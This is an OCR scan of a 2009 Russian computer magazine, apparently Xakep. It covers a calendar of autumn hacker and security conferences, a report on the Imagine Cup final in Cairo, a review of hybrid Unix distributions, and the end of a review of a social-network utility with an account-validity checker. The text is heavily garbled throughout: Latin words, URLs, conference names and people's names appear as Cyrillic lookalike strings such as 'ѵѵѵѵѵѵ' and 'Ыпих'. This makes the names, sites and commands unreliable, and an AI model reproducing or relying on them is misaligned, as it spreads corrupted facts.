сутствия ІБ-листа его можно собрать 
с помощью утилы, используя разнооб- 
разные критерии поиска : пол, город, 
страна, год рождения, положение, 
онлайн/ оффлайн, новые /старые анкеты 

• Возможность работы с группой путем 
удаления неактивных юзеров с даль- 
нейшим добавлением их в блэк-лист 

• Встроенный чекер аккаунтов — поз- 
воляет прочекать на валидность спи- 
сок имеющихся аккаунтов 

Софтина представляет собой удобный набор, со- 
стоящий из небольшихутил.Такчто, смело сливай 
ее с нашего диска — пригодится еще не раз. тг 
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СЦЕНА 



I МАРИЯ «МІРРІЫ» НЕФЕДОВА / МІРРІІ_І-(®РЕАІ-.ХАКЕР.ВІІ / 



1 ) Билл Гейтс на форуме В5А 

2 ) Такая темная комната была оборудована на ССС 
ЗЮбычная картина для любой ІТ-конференции 

4 ) Аудитория на ЭеерЗес 



Где 

отвисать 

остаток 

года 




Календарь хакерскихтусовок 
на осень-зиму 2009 



Представляем твоему вниманию календарь всевозможных конференций, фо- 
румов, фестивалей, демо-пати и других интересных событий на остатоктеку- 
щего года. Читай, выбирай и вперед — социализироваться! 



ПАРА СЛОВ О ОЕРСОЫ 

Вместо вступления позволь рас- 
сказать тебе, что совсем недав- 
но в славном городе Лас-Вегасе 
(в том самом, где блек-джек и 
падшие женщины] отгремела 
одна из главных хакерских 
тусовок планеты — йекоп. Это 
мероприятие на протяжении вот 
уже 1 7 лет (вдумайся в цифру] 
неизменно проводится именно 
в Вегасе и собираеттысячи 
человексо всего мира. Что 
забыли там все эти люди? Они 
приезжают на одно из круп- 
нейших хакерских собраний на 
нашем шарике, и год от года оно 
оправдывает их ожидания. 

Чего и кого здесьтолько не 
встретишь — ведущие специ- 
алисты в области информаци- 
онной безопасности, именитые 
хакеры, крэкеры и иже с ними, 



представители крупнейших 
ІТ-компаний, юристы, пред- 
ставители «органов» и толпы 
журналистов. Занятие на йекоп 
находится всем. Кто-то слушает 
лекции (а кто-то их читает :]], 
кто-то обзаводится полезны- 
ми связями, кто-то участвует 
во всевозможных хакерских 
конкурсах, а кто-то предпочи- 
тает нехакерские, но не менее 
веселые состязания. 

Любопытно и то, что Оекоп — 
мероприятие в некотором роде 
элитарное. Здесь собираются 
именитые гуру и признанные 
гении, и за 1 7 долгих лет конфе- 
ренция не опопсела ни на йоту, 
«левых» скрипт-киддисов ты тут 
точно не встретишь. 

Звучит чертовски заманчиво, 
верно? Что ж, хотя громкие ме- 
роприятия вроде Эекоп, Віаск 



Наі: и СеВІТ уже прошли, не ими 
одними жив наш брат. 

РКНАСК01 

КОГДА: 7 -11 сентября 
ГДЕ :Безансон, Франция 
САЙТ: ѵѵѵѵѵѵТгЬаск.огд 

Французская конференция 
РВНАСК позиционируется как 
первая международная конфа, 
созданная хакерами для хакеров. 
Ребята, конечно, немного льстят 
себе, но это, в общем-то, прости- 
тельно. 

Название РРН АС К происходит от 
сплава названий двух известных 
езинов — французского «РгНаск» 
и легендарного «РЬгаск». В этом 
году конференция состоится 
впервые, на что нам явно намека- 
ет приставка 01 в названии. Дело 
в том, что французы недавно 
сообразили, что в их стране нет 



ни одного крупного и регулярного 
мероприятия такого рода, и им 
стало обидно. Но вместо того 
чтобы сидеть и расстраиваться, 
придумали и организовали себе 
РРНАСК. 

Ожидается, что конфа возь- 
мете места в карьер и примет 
порядка полутора тысяч гостей 
из разных стран мира (офици- 
альные языки мероприятия 
— английский и французский]. 
За 4 дня эти люди собираются 
обсудить самые разнообразные 
топики — на повестке дня темы 
от руткитов и криптографии до 
хардварь хакинга и вопросов 
безопасности ЗСАОА-систем. 
Среди докладчиков обещают 
быть гуру свободного ПО Ричард 
Столл ман, Девид Халтон ака 
Ы кагі и другие, не менее инте- 
ресные личности. 
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НАСКЕР НАИЕй II 5 А 

Когда: 20-25 сентября 

Где : Майями , США 

Сайт: уууууу.ЬаскегЬаиес1.сот 

Эта кон фа — детище «Междуна- 
родного совета консультантов по 
вопросам электронной ком- 
мерции», а если сокращенно — 
ЕС-СоипсіІ. Чуваки, в частности, 
известны тем, что имеют кучу 
всевозможных сертификатов, в 
том числе и законный сертифи- 
кат «этичных хакеров». Что это 
такое? Все очень просто — их 
нанимают, чтобы они не страшно 
и не больно все взломали, 
обнаружив по ходу дыры и баги, 
которые потом сами же и помогут 
закрыть. 

Наскег НаІЧесІ проводится уже 
много лет в самых разных стра- 
нах — от Дубая до США, и мероп- 
риятие ориентировано далеко 
не на казуалов. Так, в этом году 
в США ожидаются, например, 
выступления основателя гооікіі:. 

Ш Грега Хоглунда и профес- 
сора Говарда Шмидта — экс 
специального советника Белого 
дома по вопросам безопасности 
в киберпространстве. Кроме 
них будет еще 46 (!) докладчи- 
ков. Пройдут в рамках Наскег 
НаІТесІ и различные семинары и 
тренинги, втом числе, посвя- 
щенные «этичному хакингу». Не 



обойдется и без уже традици- 
онныхигрпо «захвату флага» и 
многого, многого другого. Ску- 
чать определенно не придется. 

РАШ 

Когда: 23-25 сентября 
Где: Сен-Мало , Франция 
Сайт: ѵѵѵѵѵѵ.геппез.зиреіес.іт/ 
ВАІР2009 

Еще одна французское ме- 
роприятие, только в отличие 
от ЕПНАСК — с многолетней 
историей: «Рэйду»уже 12 лет. По 
сути, РАЮ не хакерская тусовка, 
но весьма серьезный междуна- 
родный симпозиум, на котором 
ежегодно собираются ведущие 
исследователи и специалисты, 
представители компаний-лиде- 
ров индустрии, высшие долж- 
ностные лица и т.д. Ученые мужи 
съезжаются во Францию с целью 
обмена опытом по очень широ- 
кому спектру вопросов, посвя- 
щенных защите систем и данных 
в любых видах и формах. На 
перечисление запланированных 
к обсуждению то пи ко в не хватит 
никакого места, ктомуже, можно 
ограничиться и более общей 
формулировкой — все передовые 
достижения киберпреступников 
и методы борьбы с ними будут 
обсуждать именно здесь. 



НАСКІЫТНЕВОХ 

Когда: 5-8 октября 

Где: Куала-Лумпур, Малайзия 

Сайт: ѵѵѵѵѵѵ.ЬаскіпЛіеЬох.огд 

Не успел съездить отдохнуть 
этим летом? Тогда у тебя есть 
возможность совместить отдых 
с посещением интересного 
форума — крупнейшая в Азии 
конференция Наск Іп ТЬе В ох в 
этом году пройдет в Малайзии, 
в Куала-Лумпуре. Будеттебе и 
отдых, и хак-фестиваль в лучших 
олдскульных традициях. 

Седьмая по счету НІТВ не из- 
менит себе — в программе, как 
всегда, заявлены разнообразные 
конкурсы по взлому и именитые 
спикеры, среди которых Джо 
Грант— президент СгапсІ Ібеа 
БШсІіо и основатели ресурса 
уѵікііеакз.огс . Также заплани- 
рован целый ряд тренингов. 

Как показывают предыдущие 
годы — на НІТВ просто не бывает 
неинтересно, чересчур пафосно 
или пресно. 

шрозЕсивітѵ 

М05С0ѴѴ 

Когда: 2 9 сентября — 

1 октября 

Где: Москва, Россия 
Сайт: іпФзесигіІѵтозсоѵѵ.сопп 

Читаешь и думаешь: «а чтожеу 
нас»?У настоже все в порядке. 



Например, шестая международная 
специализированная выставка- 
конференция по информационной 
безопасности намечается. Состо- 
ится она в Экспоцентре на Красной 
Пресне, в конце сентября — начале 
октября. Выставки Іпіюзесигку 
проводятся по всему миру с 1996 
года, и их организация лежит на 
плечах компании Вееб ЕхЫЬібопз 
— мирового лидера в области про- 
ведения такого рода мероприятий. 
В этом году в программе намечены 
доклады ведущих российских 
спецов в области ІТ-безопасности, 
технические семинары и бизнес- 
секции. Среди основныхтопиков 
ІпіюзесигТу: обеспечение ИБ при 
ведении бизнеса, обсуждение 
закона о персональныхданных, 
проблемы информационной безо- 
пасности в банковском секторе, ИБ 
в беспроводных сетях и т.д. 

СНА05 

СОММІІШСАТІОЫ 

СОЫеКЕЗБ 

Когда: 3-4 октября 
Где: Берлин , Германия 
Сайт: ѵѵѵѵѵѵ.ссс.сіе 

Одно из культовых и старейших 
хакерских сборищ на плане- 
те — СЬаоз Соттипісабоп 
Сопдгезз — проводится с 1984 
года! Все началось еще с хакер- 
ской коалиции СЬаоз СотріФег 
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С Іи Ь, появившейся в 80-х. Тогда 
основателям СЬаоз СотріЛег 
С Іи Ь подумалось, что непло- 
хо бы организовать какое-то 
мероприятие для себя и своих 
единомышленников, где можно 
было бы встретиться и обсудить 
самое наболевшее и актуальное. 
В результате появился Сбаоз 
СоттипісаСоп Сопдгезз. 

ССС нетолько дожил до наших 
дней, но с годами лишь стал 
лучше. Кого здесьтолько не 
встретишь — ежегодно собирает- 
ся, в среднем, 2000-3500 человек, 
среди которых и представители 
хак-сцены со всего мира, и разра- 
ботчики ПО, и спецы по безопас- 



ности, и другие интересные кадры. 
Какуже можно было понять, 
конференция не зацикливается 
на секьюрити- вопросах — об- 
суждают все: новые разработки и 
технологии, драконовские законы, 
хвастаются собственноручно на- 
писанными тулзами, обзаводятся 
интересными знакомствами. ССС 
традиционно открыта для всех 
желающих, и о ее посещении еще 
никто не жалел :]. 

5ЕСТ0В 

Когда: 5-7 октября 
Где: Торонто, Канада 
Сайт: ѵѵѵѵѵѵ.зесіог.са 



Думаешь, если в Канаде плот- 
ность населения составляет 
всего 3.29 чел ./км2, а большую 
часть страны занимает суровая 
северная природа, то здесь нет 
хороших ха к- кон фе ре нций? Ко- 
нечно, есть, и ЗесТог яркий тому 
пример. Более того — официаль- 
ный сайт ЗесТог очень нескромно 
заявляет, что в октябре в Торонто 
соберутся самые изощренные и 
«темные» умы со всего нашего 
голубого шарика. «Злые гении» 
собираются обсудить самые ост- 
рые проблемы нашего компью- 
терного настоящего, в основном 
концентрируясь, конечноже, на 
вопросах сферы безопасности. 



Докладчики-эксперты из США 
и Канады расскажут и покажут 
немало интересного, а заплани- 
рованные тренинги (например, 
«Понимание атак через веб- 
приложения»), видимо, будут 
настолько хороши, что за участие 
в них просят, ни много, ни мало, 
тысячу вечнозеленых денег. 

ВБА СОМРЕРЕІМСЕ 
(ЕІІВОРЕ) 

Ко ГДЭ : 2 0 - 2 2 октября 

Где: Лондон, Великобритания 

Сайт: ѵѵѵѵѵѵ.гзасопкгепсе.сот 

Очень серьезное мероприятие, 
стоящее на «двух китах» — инфор- 



мационной безопасности и крип- 
тографии. Н5А ежегодно проходит 
какв странах Европы и Азии, так 
и в США, но к нам сейчас ближе 
«европейская версия» форума, 
которая состоится в Лондоне, в 
20-х числах октября. Интересно, 
что каждый раз П5А проходит под 
знаком какой-то известной исто- 
рической личности, выбор которой 
во многом определяетуклон всего 
мероприятия. В прошлом годуэто 
был Алан Тьюринг, а в этом выбор 
пал на Эдгара Алана По. 

На ВЗАтрадиционно выступят 
видные ІТ-деятели, среди кото- 
рых есть и эксперты с мировыми 
именами, и директора огромных 



компаний. Вопросы обсуждаются 
серьезные и, что называется, «на 
высшем уровне». В5А тот нечаст- 
ный случай, когда за меропри- 
ятием вполне можно последить 
удаленно, не посещая его лично. 
Если ты, конечно, не испытыва- 
ешь острого желания посмотреть 
на «сильных мира сего» своими 
глазами. 

М5ВІЛІЕНАТ 

Когда: 22-2 3 октября 

Где: США 

Сайт: ѵѵѵѵѵѵ.ппісгозоЛ.сопп/ 

ксЕпеДзесигТу/ЬкебаДбекиШ 

тзрх 



Секьюрити-конференция ком- 
пании МісгозоЛ с забавным для 
русскоговорящих людей назва- 
нием ВІиеНаІ проводится дваж- 
ды в год, и осенне-зимняя уже 
на подходе — состоится в конце 
октября. Участники мероприятия 
гордо именуют себя «голубыми 
шляпами» (для уменьшения 
шокового эффекта внашихСМИ 
их обычно зовут «синими»), что 
на самом деле не более чем ана- 
логия с этичными хакерами ѴѴЕТе 
ГіаЕ и пофигистами Віаск ЬаС 
На В Іи е Н аЕ ѵ9 собираются 
поговорить о широком спектре 
проблем, среди топ и ко в заяв- 
лены мобильные\беспроводные 
девайсы и малварь всех мастей, 
реверсный инжиниринг и созда- 
ние эксплойтов и другие нехоро- 
шие вещи. Словом, традиционно 
для МісгозоіТ — будет небезын- 
тересно, но очень культурно и «в 
рамках». 

тооксом 

Ко ГДЭ : 2 3 - 2 5 октября 
Где: Сан-диего , США 

Сайт: \л/ѵѵѵѵТоогсоп.огд 

Если у тебя нетжелания слушать 
«синих шапок» на ВІиеНаС вот 
тебе альтернатива — ТоогСоп, 
проходящий почти в то же самое 
время в солнечном Сан-Диего. 
ТоогСоп конференция старая, 
известная, с богатой 1 1 -летней 
историей. Мероприятие начи- 
налось кактусовка для довольно 
узкого круга специалистов по 
безопасности и в первые годы 
собирало всего порядка 300-500 
человек, нона сегодняшний день 
ТоогСоп вышел на совсем иной 
уровень. Также, как и Беіюоп, эта 
конференция сумела с годами не 
растерять своего уникального 
духа и остается весьма «камер- 
ной», непафосной и интересной. 



КАЖДЫЙ РАЗ Р5А П РОХОД ИТ П ОД 3 НАКО М КА- 
КОЙ-ТО ИЗВЕСТНОЙ ИСТОРИЧЕСКОЙ ЛИЧНОС- 
ТИ, ВЫБОР КОТОРОЙ ВО МНОГОМ ОПРЕДЕЛЯЕТ 
УКЛОН ВСЕГО МЕРОПРИЯТИЯ. В ПРОШЛОМ 

ГОДУЭТО БЫЛ АЛАН ТЬЮРИНГ, А В ЭТОМ ЭДГАР 
АЛАН ПО. 
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1) Маш и на «Энигма» с Р5А2008, посвященной 
Тьюрингу 

2 ) НІТВ ‘08. Нетолько ломают, но и создают! 
ЗЖусочек стенда с ЗоКооІ 2007 

4 ) Нежелаешь что-нибудь взломать? :] 

5 ) Толпа на Беіюоп 









50РТ00І. 

Когда: 27-30 октября 
Где: Москва, Россия 
Сайт: ѵѵѵѵѵѵ.зо^ооі.ги 

Еще одно «наше» мероприятие 
— ежегодная выставка инфор- 
мационных и коммуникацион- 
ных технологий ЭоіТооІ. Один из 
старейших в России форумов 
такого рода в этом году отметит 
свой 20-летний юбилей. В рам- 
ках ЭоіТооІ пройдут всероссийс- 
кая конференция «Электронное 
государство XXI века», третья 
международная конференция 



«Стандартизация информаци- 
онных технологий и интеропе- 
рабельность. 5ІТОР’2009», круг- 
лый стол с участием главных 
конструкторов информатизации 
регионов РФ и руководителей 
ИТ-компаний, национальный 
форум «Информационное 
общество, электронное госу- 
дарство, электронное прави- 
тельство», секция «Развитие ПО 
с открытым кодом в интересах 
информационного общества» и 
т.д. Помимо перечисленного, на 
ЗоіТооІ состоится демонстрация 



различного ПО, пройдут много- 
численные пресс-конференции, 
мастер-классы, ток-шоу, кон- 
курсы, лотереи, круглые столы 
с представителями отечествен- 
ной промышленности и многое, 
многое другое. 

0ЕЕР5ЕС 

Когда: 17-2 0 ноября 
Где: Вена, Австрия 
Сайт: сіеерзес.пеі 

Ежегодная европейская конфе- 
ренция ОеерЗес, как ни странно, 
единственная из всех в этом 



списке, на чьем сайте сказано, 
что организаторы будут рады 
приветствовать на мероприя- 
тии представителей хакерского 
андеграунда :). Также ОеерЗес на- 
зываетсвоей целевой аудиторией 
секьюрити-профессионалов, раз- 
работчиков софта, админов всех 
мастей и высших должностных 
лиц. Главной темой конфы в этом 
году станут всевозможные «скры- 
тые угрозы», то есть эксплойты, 
руткиты и другие проблемы ИБ, 
недооцененные в силу своей 
незаметности. □с 
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НМА6ІЫЕ СУР 2009 



■ Отчет с мирового финала в Каире 



ІтадіпеСир — крупнейшее мировое студенческое ІТ-состязание, объединив- 
шее в этом году 300 000 студентов из 142 стран мира. На финальное соревно- 
вание в Каире прибыло 148 команд, которые приехали бороться за мировую 
славу, престижсвоей страны и, в качестве дополнения — за призовой фонд, 
состоящий из $288 000. 



СТРУКТУРА 

ІМА6ШЕСІІР 

В этом году Ітадіпе Сир проходил 
вдевяти категориях, названия 
большинства из которых нетребуют 
перевода: 

ЗоНѵѵагеОезідп 

ЕтЬесИесІ Оеѵеіортепі 

батеОеѵеІортепі 

ІТСЬаІІепде 

РоЬоІісз & АІдогіШт 

МазЬ II р 

РЬоІодгарЬу 

ЗЬогіРіІт 

Резідп 

Главная, основная и исторически 
самая престижная категория — это 
5оЬ:\л/аге Оезідп. Об этом легко 
судить даже по количеству фина- 
листов, приглашенных на финал: 

68 команд. Вторая по численности 
участников категория — ЕтЬесИесІ 
Оеѵеіортепі: — собрала только 20. 
Россия в этом году была представ- 
лена двумя командами: ѴіТаІ І_аЬ и 
Теат Риззіа, выступавшими, соот- 
ветственно, в категориях ВоОлл/аге 
Оезідп и ЕтЬесИесІ ОеѵеІортепЕ 

КОМАНДА ѴІТАІ. І_АВ 

Команда Ѵіііаі ЕаЬ состоит из 
четырех ниже городских студентов 



НН ГУ им. Лобачевского: Максима 
Бовыкина, Дениса Гнатюка, Алек- 
сея Клишина и Сергея Федорова. 
Под руководством своего друга и 
научрука Сергея Сидорова ребята 
разработали систему «ѴіѴа» для 
предотвращения и борьбы с вирус- 
ными эпидемиями. 

Дело втом, что в настоящий момент 
эпидемиологи в России и прак- 
тически по всему миру работают 
по старинке: собирают бумажные 
анкеты с пациентов, вручную обра- 
батываюттонны бумаги и руками же 
строят из этого выводы о причинах 
эпидемии и способах борьбы с 
ней. Такой подход — настоящий 
архаизм, неэффективный и мед- 
ленный. Команда ѴіІаНаЬ решила 
попытаться помочь человечеству и 
разработала электронную систему 
для борьбы с эпидемиями, которая 
н е тол ь ко а вто м ати з и ру ет все 
рутинные процессы, но и исполь- 
зует современные алгоритмы для 
поиска групп эпидемиологического 
риска, очага инфекции ит.д. 

Проект представляет собой доста- 
точно сложную систему, настоящий 
программный комплекс, состоящий 
изтрехосновных подсистем: 

ѴіѴа НеаНЫгаскег 
Этот модуль использует ал го ритмы 



машинного обучения и позволяет 
определять группу риска, то есть 
группулюдей, рискзаболеть кото- 
рых наиболее велик. При помощи 
специальныхустройств осущест- 
вляется мониторинг показателей 
их здоровья, что позволяет выявить 
моментначала заболевания и 
быстро принять меры по лечению. 

ѴіѴа РезіЬоІеРіпсІег 
На основе данных, полученных 
отзаболевшихлюдей с помощью 
специальногоанкетирования, под- 
система, используя статистический 
подход, позволяетопределитьочаг 
инфекции. Информация отекущей 
эпидемиологической обстановке 
доступна в реальном времени 
эпидемиологу, который может неза- 
медлительно предупредитьлюдей 
об опасности через подсистему 
оповещения. 

• ѴіѴаАІег* 

Подсистема оповещения, состоя- 
щая из ѴѴіпсіоѵѵз ОабдеГ веб-пор- 
тала и приложения для мобильных 
устройств, незамедлительно 
инфор- мируетлюдей об опасности. 
С ее помощью каждый пользова- 
тель может получить актуальную 
информацию отекущей эпидеми- 
ологической обстановке в любом 
регионеземного шара. 



КОМАНДА 

ЗОІШОЗТВЕАМЕВЗ 

Вторая российская команда 
ЗоипсВіхеатегБ представляла 
МГУ и участвовала в соревно- 
вании ЕтЬесИесІ ОеѵеИртепГ 
Состав команды: Ярослав Третья- 
ков, Михаил Яковлев и Юрий Жай- 
воронок. В категории ЕтЬесИесІ 
Оеѵеіортепі участникам нужно 
было разработать систему на 
базе ЕтЬесИесІ РС еВох-4300: 
миниатюрного компьютера с за- 
паянным процессором, памятью, 
всеми нужными контроллерами 
и т.д. На этот девайс ставится 
ѴѴі пс1о\л/5 ЕтЬесИесІ СЕ, после 
этого система конфигурируется и 
пишется управляющая «прошив- 
ка», основная программа для 
реализации задумки. 

У ребят была достаточно инте- 
ресная идея: сделать концепт 
доступной системы для цифрового 
стриминга звука, чтобы можно 
было лить на колонки звуке любых 
устройств через существующую 
сетевую и ѵѵі-Гі инфраструктуру, 
не подключая никаких дополни- 
тельных кабелей. В их концепте 
колонки обыкновенными звуко- 
выми кабелями подключаются к 
етЬесИесІ -де вайсам, ате, в свою 
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1 МЕСТО: 5ѴТЕСН, Румыния 1 МЕСТО: ѴѴа^гее, Корея 

2 МЕСТО: Ѵііаі І_аЬ, Россия 2 МЕСТО: І5ее, Китай 

3 МЕСТО: Ѵігіиаі Бгеаплз, Бразилия 3 МЕСТО: Іпіеііесігопісз, Украина 



очередь, по витой паре подключа- 
ются к домашнему роутеру. На этом 
этапе хардварный сетап можно 
считать законченным: выполнив 
это один раз, в будущем можно 
с использованием клиентского 
софта лить на колонки звук, при 
этом абсолютно неважно, какой 
источникзвука используется: 
стационарный комп, ноутбук или 
смартфон. И никаких проводов 
не нужно, ведь используется уже 
существующая инфраструктура. 

СОРЕВНОВАНИЯ 

ІтадіпеСир — это во многом кон- 
курс презентаций. «Состязания» 
проходят в несколько раундов: все 
команды по специально состав- 
ленному расписанию презентуют в 
полузакрытом режиме свой проект 
коллегии компетентных судей, а 
те, в свою очередь, разносторонне 
оценивают проекты, выставляя 
оценки по разным критериям. 
Соответственно, на первый 
план выходитто, каким образом 
командам удается за короткое 
время показать себя: даже с очень 



крутым и сложным проектом 
легко потеряться и произвести 
неудачное впечатление на судей, 
если неправильно построить пре- 
зентацию и неуверенно отвечать 
на вопросы. Плюс есть языковый 
аспект: все презентации, разуме- 
ется, проходят на английском, и 
это является определенным огра- 
ничением для многих команд. 
После «закрытых» раундов опре- 
деляются лидирующие команды, 
которые проходят в суперфинал, 
общедоступное соревнование. 
Ксожалению, команде ЗоипсІ- 
Зіхеатегз с проектом Ехозігеат 
неудалось пройти далеко по 
турнирной сетке. Несмотря на 
то, что проект всем понравился, 
ребята не смогли убедить судей в 
глубокой связи своего проекта с 
темой соревнования — решением 
глобальных проблем человечест- 
ва. Посчитав, что стримингзвука 
без проводов не является очень 
уж глобальной проблемой, судьи 
отсеяли проект . 

Зато нижегородская команда с 
проектом ѴіѴа показала очень вну- 



шительный и достойный резуль- 
тат: ребята вышли в суперфинал и 
по его результатам заняли второе 
место, пропустив впередлишь 
румынскую команду 5УТЕСН. 

ТЫ МОЖЕШЬ 

ВЫИГРАТЬ 

ІМА6ШЕСиР2010! 

Второе место на мировом финале 
Ітадіпе Сир - это отличный ре- 
зультат, это очень престижно для 
любой страны. Но, вто же время, 
второе место это всегда второе 
место, это не победа. Пора бы уже 
и российской команде выиграть 
Ітадіпе Сир! И хорошая новость 
тут в то м , что ты тоже м оже ш ь б ыть 
в составе этой команды. 

Конкурс Ітадіпе Сир открыт для 
всех студентов, желающих про- 
явить себя, реализовать свой та- 
лант и свою целеустремленность. 
Самое главное - это энтузиазм, 
увлеченность и желаниеучиться 
новому. Для студента технического 
ВУЗа, особенно видящего свое 
будущее в разработке софта - это 
отличная возможность попро- 



боватьсвои силы, во-первых, в 
командной работе над реальным 
проектом, а во-вторых, в грамот- 
ном его описании, презентации 
и позиционировании. Участие в 
таком конкурсе дает бесценные 
скиллы, которые 100% пригодятся 
в будущем. 

Для участия в Ітадіпе Сир нужно 
придумать интересную идею, сде- 
лать прототип продукта, хорошо 
его описать и подать за явку до 
февраля 2010 года, после чего вы- 
годно представить на региональ- 
ном финале, после чего биться за 
единственную путевку в Польшу 
уже на российском финале. 

Все подробности, ответы на любые 
вопросы, форум и все остальное 
можно найти на двух сайтах: 
ітадіпесир.ги и ітадіпесир. сот. 
Также нелишним будет напом- 
нить, что Ітадіпе Сир - это не 
только ЗоІТѵѵаге Оезідп. Сорев- 
нования проводятся еще в куче 
других категорий и специальных 
номинаций, ознакомиться с кото- 
рыми ты можешь поуже приведен- 
ным ссылкам, -г 
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■ ■АЛЕКСАНДР «АК-47 » КАЛАШНИКОВ /ТІІХООРІѴЕКгаѴАЫОЕХ.ВІІ / 




ІЗІаскѵѵаге + ркдзгс из ЫеіВЗО = Ргасо ОІМЦ/Цпих 



I 



0реп5оІагіз + ІЛэипіи = Ыехепіа Соге РІаЛогт 
Ыпих + ЫеШ5Р = 85Р/Ыпих 



ІІЬипШ + ѴѴіпсІоѵѵз = апсІШіпих 




РеЬіап ссердцем демона 



I 

II 



Нашествие мутантов 

Обзор необычных *піх-дистрибутивов 



Существует достаточно опера ционок со свободными лицензиями — 
СІЧІІ/ипих, хВЗй, ОрепЗоІагіз, но не все юниксоиды удовлетворены 
возможностями, заложенными разработчиками. Поэтому практичес- 
ки с первых дней предпринимались попытки собрать удачные идеи и 
наработки в одном дистрибутиве. В итоге, на сегодня мы имеем целый 
ряд интересных гибридных систем. 



5І.АСКѴѴАКЕ + РК65РС ИЗ 
ЫЕТВ50 = О РАСО бшимііх 

Слака, любимая многими пользователями, 
всеже неудобна сточки зрения новичка, как 
минимум, потому, что система управления 
пакетов оста вляетжелать лучшего. В начале 
2006 года два норвежца 50ап Апсігеаззеп и Оіе 
Апбге ПосШе решили создать более удобную 
систему пакетов к этому дистрибутиву. Правда, 
спустя несколько месяцев кропотливой работы 
на проекте пришлось поставить крест — двум 
энтузиастам такая задача оказалась просто 



не под силу. Но Оіе не опустил руки и начал 
прикручивать к Віаскѵѵаге систему управления 
пакетами ркдзгс, разрабатываемую в рамках 
проекта ІЧеіВЗО (ркдзгс интересна тем, что 
работаете Ргее/0реп/0гадопР1уВ50, Ыпих, 
Зоіагіз, ОІЧХ, I Р IX, МасОЗХи даже виндой 
через «Службы ѴѴіпбоѵѵз для ЦЫ IX». ѵѵѵѵѵѵ. 
тісгозоІРсот/ѵѵіпбоѵѵз/зІи ). Так появился 
Огасо ОІ\ІІІ/І_іпих. 

В настоящее время в дистрибутиве доступно 
около 1000 «своих» пакетов. Все они с коман- 
дами для установки перечислены на странице 



ѵѵѵѵѵѵ.бгасоІіпих.огд/раскадез.ЫппІ . Но основ- 
ным источником приложений для Огасо всеже 
являются пакеты из ІЧеіВВО, коих в настоящее 
время -7900. 

«Дракон» распространяется в нескольких ва- 
риантах— для сетевой установки (бгасо-ЬооІ:], 
без ОШ (бгасо) и с КОЕ 3.5. 10 (бгасо-кЗ). Версии 
сХРСе и РІихЬох, разрабатываемые ранее, 
ныне недоступны. Поддерживается установка с 
СИ, 05В и харда. 

Текущая стабильная версия 0.3.1 использует 
ядро 2.6.23 с оптимизацией под І486 платформу 
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Выбираем компоненты 
во времяустановки 
55Р/1_іпих 
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и распространяется только в варианте без 61)1. 
Инсталлятор «Огасо зеіир», кроме цвета (крас- 
ный!), ничем неотличается от инсталлятора 
слаки. Привыкшим кспартанскому интерфейсу 
детища Патрика Фолькердинга разобраться 
будет просто. При помощи Шізк/сітііз к следует 
вручную создать раздел, подготовить и активи- 
ровать своп (ткзѵѵар/зѵѵароп), а затем начать 
установку командой зеіир. Созданные походу 
процесса разделы можно отформатировать в 
ех{2/ех1:3, ПеізегР5,ХР5 и ЗЕ5. Предлагается 
семь групп пакетов (зузііет, бізк, беѵеі, пеР/ѵогк, 
ехФа, бгіѵегз, Ргтѵѵаге) с возможностью выбора 
индивидуальных приложений. Чтобы узнать, 
какие пакеты включены в группу, проще всего 
заглянуть в одноименный каталог на СО. Далее 
заводим учетную запись, ставим 1_І1_0 и указы- 
ваем сервисы для загрузки. Процессустановки 
и последующей загрузки системы проходит 
довольно быстро. 

Дистрибутив по умолчанию включает ми- 
нимум приложений. Все остальное поможет 
установить менеджер пакетов ОгасоРКС. 
Команды очень напоминают АРТ и просты для 
запоминания. Для поиска пакета вводим «бр 
зеагсб <пате>», для установки — «бр іпзіаіі 
<раскаде_пате>», удаление производится 
командой «бр гетоѵе <раскаде_пате>», а по- 
лучить информацию о пакете поможет«бр іпЬ 
<раскаде_пате>». Есть команды для аудита 
и обновления системы, работы с сервисами и 
гибернацией. Чтобы обновить систему, доста- 
точно ввести: 

# сір аисіік ирбаке 

# сір аибік зузкет 

# сір ирбаке зузкет 

# сір аибік зузкет 

# Іііо 

і_шііх+ метвзо = 550/иыих 

Дистрибутив ЗЗО/Ыпих ( ѵѵѵѵѵѵ.ріабіоте.сопп ) 
разрабатывается японской компанией 
РІаЕНоте и используется, в первую очередь, в 
качестве встроенной ОС для продаваемыхей 
мини-серверов ОрепМісгоЗегѵеги 0репВ1оск5. 
Сервачки поставляются в виде готовых реше- 



X Программа установки Ргасо 
Ыпих создана явно под 
влиянием Зіаскѵѵаге 

ний, запакованных в герметичный корпус, кото- 
рый приспособлен для работы в экстремальных 
условиях (рабочий диапазон температур окру- 
жающей среды — от 0 до 50 С). Потребляеттакое 
устройство всего ничего, около 8 Ваттэнергии, 
и имеет просто нереальное время наработки 
на отказ — 48лет. Такиххарактеристикудалось 
добиться, в том числе благодаря тому, что в 
системе используется 550-накопитель. 

По нынешним меркам системныетребования 
просто смешные: І486 СР1Ч, 8 Мб ОЗУ и 350 Мб 
свободного места на харде. Для сравнения 
взглянем на запросы ІбЬипІю 9.04 Ыебэоок 
Нетіх: ІпІюІАЬт, 384 Мб ОЗУ и 1 Гб диск. Конеч- 
но, это два разныхдистрибутива, ориентирован- 
ных на свои задачи, но пользовательЗЗО/Ыпих 
может самостоятельно «допилить» систему 
до нужного уровня «удобство/производитель- 
ность». Собственно, адаптация под флеш-карты 
и нетребовательность к ресурсам и привлекает 
к550/Ыпих пользователей нетбуков, знающих, 
как собрать систему, и разочаровавшихся в 
производительности поставляемой с компью- 
тером ОС. 

Самаяже главная необычностьЗЗО/Ыпих 
состоит в том, что в нем сочетается ядро Ыпих 
2.6.x с базовым программным окружением и 
библиотеками из ЫеЛЗЗО, плюс реализована 
В50-подобная конфигурация через Мс/гс.сопГ 
Такой странный выбор сами разработчики никак 
не объясняют, крометого, что они создают реше- 
ния на основе обеих систем еще с девяностых и 
четко осознают достоинства и недостатки каж- 
дой из них. Поэтому можно предположить, что 
все дело в моде. Так, использованиеторговой 
марки Ыпих, которая сегодня у всех на слуху, мо- 
жет прибавить вес конечному продукту, а значит, 
привлечь покупателей. И не секрет, что ядро 
Ыпих развивается на порядок быстрее своих 
хВ50 собратьев, нововведения здесь появля- 
ются раньше, крометого, для Ыпих поставляется 
больше драйверов (хотя часто это идет в ущерб 
стабильности). Использованиеже в качестве ок- 
ружения ЫеіВЗО позволяет разработчикам 550/ 
Ыпих выбрать лицензию, отличную отбІМІ) 6РЕ, 
и вносить в код системы закрытые патчи. Что, 
собственно, и сделано — 550/Ыпих распростра- 
няется под В50-подобной лицензией. 
Дистрибутив не содержит ничего лишнего, 
поэтому даже без 6111 при наличии некоторых 
знаний использовать его очень просто. Для 



загрузки доступны установочный 150 (правда, 
на моментнаписания статьи для последней 
